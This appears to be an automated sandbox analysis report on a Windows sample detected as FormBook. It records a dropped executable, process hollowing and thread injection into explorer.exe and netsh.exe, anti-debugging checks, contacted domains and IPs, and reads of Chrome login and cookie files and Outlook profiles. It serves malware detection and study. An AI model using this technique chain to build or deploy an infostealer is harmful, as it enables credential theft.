Source: C:\Users\user\Desktop\qHpeBvr9cR.exe Code function: 0_2_0040324F EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess, 0_2_0040324F
Detected potential crypto function
Source: C:\Users\user\Desktop\qHpeBvr9cR.exe Code function: 0_2_00406333 0_2_00406333
Source: C:\Users\user\Desktop\qHpeBvr9cR.exe Code function: 0_2_00404936 0_2_00404936
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Code function: 1_2_00B2A9AA 1_2_00B2A9AA
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Code function: 1_2_00B134E0 1_2_00B134E0
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Code function: 1_2_00B1C4C0 1_2_00B1C4C0
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Code function: 1_2_00B18E70 1_2_00B18E70
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Code function: 2_2_004012B0 2_2_004012B0
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Code function: 2_2_0042193D 2_2_0042193D
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Code function: 2_2_00421284 2_2_00421284
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Code function: 2_2_004012A4 2_2_004012A4
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Code function: 2_2_0040B453 2_2_0040B453
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Code function: 2_2_0040B457 2_2_0040B457
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Code function: 2_2_00422429 2_2_00422429
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Code function: 2_2_004044C7 2_2_004044C7
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Code function: 2_2_004044BE 2_2_004044BE
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Code function: 2_2_004046E7 2_2_004046E7
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Code function: 2_2_0040FE87 2_2_0040FE87
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Code function: 2_2_00B2A9AA 2_2_00B2A9AA
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Code function: 2_2_00B134E0 2_2_00B134E0
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Code function: 2_2_00B1C4C0 2_2_00B1C4C0
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Code function: 2_2_00B18E70 2_2_00B18E70
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Code function: String function: 00B1D900 appears 64 times
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Code function: String function: 00B22574 appears 36 times
Contains functionality to call native functions
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Code function: 2_2_0041E087 NtAllocateVirtualMemory, 2_2_0041E087
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Code function: 2_2_004012B0 EntryPoint,NtProtectVirtualMemory, 2_2_004012B0
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Code function: 2_2_0041DEA7 NtCreateFile, 2_2_0041DEA7
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Code function: 2_2_0041DF57 NtReadFile, 2_2_0041DF57
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Code function: 2_2_0041DFD7 NtClose, 2_2_0041DFD7
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Code function: 2_2_0041E081 NtAllocateVirtualMemory, 2_2_0041E081
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Code function: 2_2_004012A4 EntryPoint,NtProtectVirtualMemory, 2_2_004012A4
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Code function: 2_2_004014E9 NtProtectVirtualMemory, 2_2_004014E9
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Code function: 2_2_0041DF52 NtReadFile, 2_2_0041DF52
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Code function: 2_2_0041DFD2 NtClose, 2_2_0041DFD2
Source: qHpeBvr9cR.exe ReversingLabs: Detection: 41%
Source: qHpeBvr9cR.exe Virustotal: Detection: 36%
Source: C:\Users\user\Desktop\qHpeBvr9cR.exe File read: C:\Users\user\Desktop\qHpeBvr9cR.exe Jump to behavior
Source: qHpeBvr9cR.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\qHpeBvr9cR.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\qHpeBvr9cR.exe C:\Users\user\Desktop\qHpeBvr9cR.exe
Source: C:\Users\user\Desktop\qHpeBvr9cR.exe Process created: C:\Users\user\AppData\Local\Temp\febcldoukq.exe "C:\Users\user\AppData\Local\Temp\febcldoukq.exe" C:\Users\user\AppData\Local\Temp\uebzn.cef
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Process created: C:\Users\user\AppData\Local\Temp\febcldoukq.exe "C:\Users\user\AppData\Local\Temp\febcldoukq.exe" C:\Users\user\AppData\Local\Temp\uebzn.cef
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\autochk.exe C:\Windows\SysWOW64\autochk.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\netsh.exe C:\Windows\SysWOW64\netsh.exe
Source: C:\Users\user\Desktop\qHpeBvr9cR.exe Process created: C:\Users\user\AppData\Local\Temp\febcldoukq.exe "C:\Users\user\AppData\Local\Temp\febcldoukq.exe" C:\Users\user\AppData\Local\Temp\uebzn.cef Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Process created: C:\Users\user\AppData\Local\Temp\febcldoukq.exe "C:\Users\user\AppData\Local\Temp\febcldoukq.exe" C:\Users\user\AppData\Local\Temp\uebzn.cef Jump to behavior
Source: C:\Users\user\Desktop\qHpeBvr9cR.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\qHpeBvr9cR.exe File created: C:\Users\user\AppData\Local\Temp\nsx95CB.tmp Jump to behavior
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@7/5@7/4
Source: C:\Users\user\Desktop\qHpeBvr9cR.exe Code function: 0_2_00402036 CoCreateInstance,MultiByteToWideChar, 0_2_00402036
Source: C:\Users\user\Desktop\qHpeBvr9cR.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\qHpeBvr9cR.exe Code function: 0_2_004043F5 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA, 0_2_004043F5
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Command line argument: --headless 1_2_00B118D0
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Command line argument: --unix 1_2_00B118D0
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Command line argument: --width 1_2_00B118D0
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Command line argument: --height 1_2_00B118D0
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Command line argument: --signal 1_2_00B118D0
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Command line argument: --server 1_2_00B118D0
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Command line argument: --headless 2_2_00B118D0
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Command line argument: --unix 2_2_00B118D0
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Command line argument: --width 2_2_00B118D0
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Command line argument: --height 2_2_00B118D0
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Command line argument: --signal 2_2_00B118D0
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Command line argument: --server 2_2_00B118D0
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\ Jump to behavior
Source: Binary string: netsh.pdb source: febcldoukq.exe, 00000002.00000002.402996067.0000000002F70000.00000040.10000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: febcldoukq.exe, 00000001.00000003.293154530.0000000003060000.00000004.00001000.00020000.00000000.sdmp, febcldoukq.exe, 00000001.00000003.297615562.0000000003630000.00000004.00001000.00020000.00000000.sdmp, febcldoukq.exe, 00000002.00000003.300663254.0000000000E5B000.00000004.00000800.00020000.00000000.sdmp, febcldoukq.exe, 00000002.00000002.400649105.000000000110F000.00000040.00000800.00020000.00000000.sdmp, febcldoukq.exe, 00000002.00000002.398907397.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, netsh.exe, 00000005.00000003.392692809.0000000000FD2000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000005.00000003.400318872.00000000032AF000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000005.00000002.564732958.000000000356F000.00000040.00000800.00020000.00000000.sdmp, netsh.exe, 00000005.00000002.563098627.0000000003450000.00000040.00000800.00020000.00000000.sdmp
Source: Binary string: netsh.pdbGCTL source: febcldoukq.exe, 00000002.00000002.402996067.0000000002F70000.00000040.10000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdb source: febcldoukq.exe, 00000001.00000003.293154530.0000000003060000.00000004.00001000.00020000.00000000.sdmp, febcldoukq.exe, 00000001.00000003.297615562.0000000003630000.00000004.00001000.00020000.00000000.sdmp, febcldoukq.exe, 00000002.00000003.300663254.0000000000E5B000.00000004.00000800.00020000.00000000.sdmp, febcldoukq.exe, 00000002.00000002.400649105.000000000110F000.00000040.00000800.00020000.00000000.sdmp, febcldoukq.exe, 00000002.00000002.398907397.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, netsh.exe, 00000005.00000003.392692809.0000000000FD2000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000005.00000003.400318872.00000000032AF000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000005.00000002.564732958.000000000356F000.00000040.00000800.00020000.00000000.sdmp, netsh.exe, 00000005.00000002.563098627.0000000003450000.00000040.00000800.00020000.00000000.sdmp
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Code function: 1_2_00B25A15 push ecx; ret 1_2_00B25A28
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Code function: 2_2_004210E9 push eax; ret 2_2_004210EF
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Code function: 2_2_004210F2 push eax; ret 2_2_00421159
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Code function: 2_2_0042109C push eax; ret 2_2_004210EF
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Code function: 2_2_00421153 push eax; ret 2_2_00421159
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Code function: 2_2_0040EAA3 push ecx; retf 2_2_0040EAA6
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Code function: 2_2_0041E5D0 push ecx; iretd 2_2_0041E5D2
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Code function: 2_2_00419F38 push edx; ret 2_2_00419F39
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Code function: 2_2_0041FF93 push ebx; retf 2_2_0041FF94
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Code function: 2_2_00B25A15 push ecx; ret 2_2_00B25A28
PE file contains sections with non-standard names
Source: febcldoukq.exe.0.dr Static PE information: section name: .00cfg
Source: febcldoukq.exe.0.dr Static PE information: section name: .voltbl
Drops PE files
Source: C:\Users\user\Desktop\qHpeBvr9cR.exe File created: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Jump to dropped file
Source: C:\Users\user\Desktop\qHpeBvr9cR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\netsh.exe Last function: Thread delayed
Found large amount of non-executed APIs
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe API coverage: 2.2 %
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe API coverage: 2.6 %
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\Desktop\qHpeBvr9cR.exe Code function: 0_2_00405620 CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA, 0_2_00405620
Source: C:\Users\user\Desktop\qHpeBvr9cR.exe Code function: 0_2_00405FF6 FindFirstFileA,FindClose, 0_2_00405FF6
Source: C:\Users\user\Desktop\qHpeBvr9cR.exe Code function: 0_2_00402654 FindFirstFileA, 0_2_00402654
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Code function: 1_2_00B25293 FindFirstFileExW, 1_2_00B25293
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Code function: 1_2_00B25347 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 1_2_00B25347
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Code function: 2_2_00B25293 FindFirstFileExW, 2_2_00B25293
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Code function: 2_2_00B25347 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 2_2_00B25347
Source: C:\Users\user\Desktop\qHpeBvr9cR.exe API call chain: ExitProcess graph end node
Source: explorer.exe, 00000003.00000000.365808635.0000000008631000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000003.00000000.303735560.000000000091F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000003.00000000.366190197.00000000086E7000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}i
Source: explorer.exe, 00000003.00000000.366190197.00000000086E7000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000003.00000000.338206694.00000000043B0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000003.00000000.366190197.00000000086E7000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 00000003.00000000.365808635.0000000008631000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Code function: 1_2_00B237DA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_00B237DA
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Code function: 1_2_00B2258B GetProcessHeap, 1_2_00B2258B
Enables debug privileges
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Process token adjusted: Debug Jump to behavior
Contains functionality to read the PEB
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Code function: 1_2_00B2009E mov ecx, dword ptr fs:[00000030h] 1_2_00B2009E
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Code function: 1_2_00B2418D mov eax, dword ptr fs:[00000030h] 1_2_00B2418D
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Code function: 2_2_00B2009E mov ecx, dword ptr fs:[00000030h] 2_2_00B2009E
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Code function: 2_2_00B2418D mov eax, dword ptr fs:[00000030h] 2_2_00B2418D
Checks if the current process is being debugged
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Process queried: DebugPort Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Code function: 2_2_0040C317 LdrLoadDll, 2_2_0040C317
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Code function: 1_2_00B1D720 SetUnhandledExceptionFilter, 1_2_00B1D720
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Code function: 1_2_00B1DC2D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 1_2_00B1DC2D
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Code function: 1_2_00B237DA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_00B237DA
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Code function: 1_2_00B1D72C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_00B1D72C
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Code function: 2_2_00B1DC2D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 2_2_00B1DC2D
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Code function: 2_2_00B237DA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 2_2_00B237DA
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Code function: 2_2_00B1D720 SetUnhandledExceptionFilter, 2_2_00B1D720
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Code function: 2_2_00B1D72C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 2_2_00B1D72C

HIPS / PFW / Operating System Protection Evasion
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: www.patrickguarte.com
Source: C:\Windows\explorer.exe Network Connect: 155.159.61.221 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.eufidelizo.com
Source: C:\Windows\explorer.exe Domain query: www.lyonfinancialusa.com
Source: C:\Windows\explorer.exe Domain query: www.afterdarksocial.club
Source: C:\Windows\explorer.exe Network Connect: 192.185.217.47 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 206.233.197.135 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 162.214.129.149 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.19t221013d.tokyo
Sample uses process hollowing technique
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Section unmapped: C:\Windows\SysWOW64\netsh.exe base address: 1280000 Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Section loaded: unknown target: C:\Users\user\AppData\Local\Temp\febcldoukq.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Section loaded: unknown target: C:\Windows\SysWOW64\netsh.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Section loaded: unknown target: C:\Windows\SysWOW64\netsh.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Thread APC queued: target process: C:\Windows\explorer.exe Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Thread register set: target process: 3324 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Thread register set: target process: 3324 Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Thread register set: target process: 3324 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Process created: C:\Users\user\AppData\Local\Temp\febcldoukq.exe "C:\Users\user\AppData\Local\Temp\febcldoukq.exe" C:\Users\user\AppData\Local\Temp\uebzn.cef Jump to behavior
Source: explorer.exe, 00000003.00000000.336598511.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.340255020.0000000005910000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.304065105.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000003.00000000.336598511.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.304065105.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.356385901.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: uProgram Manager*r
Source: explorer.exe, 00000003.00000000.336598511.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.304065105.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.356385901.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000003.00000000.336598511.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.304065105.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.356385901.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 00000003.00000000.303378350.0000000000878000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.356013433.0000000000878000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ProgmanLoc*U
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Code function: 1_2_00B1D945 cpuid 1_2_00B1D945
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Code function: 1_2_00B1D5D2 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 1_2_00B1D5D2
Source: C:\Users\user\Desktop\qHpeBvr9cR.exe Code function: 0_2_0040324F EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess, 0_2_0040324F

Lowering of HIPS / PFW / Operating System Security Settings
barindex
Uses netsh to modify the Windows network and firewall settings
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\netsh.exe C:\Windows\SysWOW64\netsh.exe

Stealing of Sensitive Information
barindex
Yara detected FormBook
Source: Yara match File source: 2.2.febcldoukq.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.febcldoukq.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.555011698.00000000007D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.561579336.0000000001100000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.395778723.0000000000F00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.393576373.0000000000B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.559931003.00000000010D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.369567476.000000000E3B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.393032745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.347863799.000000000E3B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Tries to steal Mail credentials (via file / registry access)
Source: C:\Windows\SysWOW64\netsh.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\SysWOW64\netsh.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State Jump to behavior

Remote Access Functionality
barindex
Yara detected FormBook
Source: Yara match File source: 2.2.febcldoukq.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.febcldoukq.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.555011698.00000000007D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.561579336.0000000001100000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.395778723.0000000000F00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.393576373.0000000000B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.559931003.00000000010D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
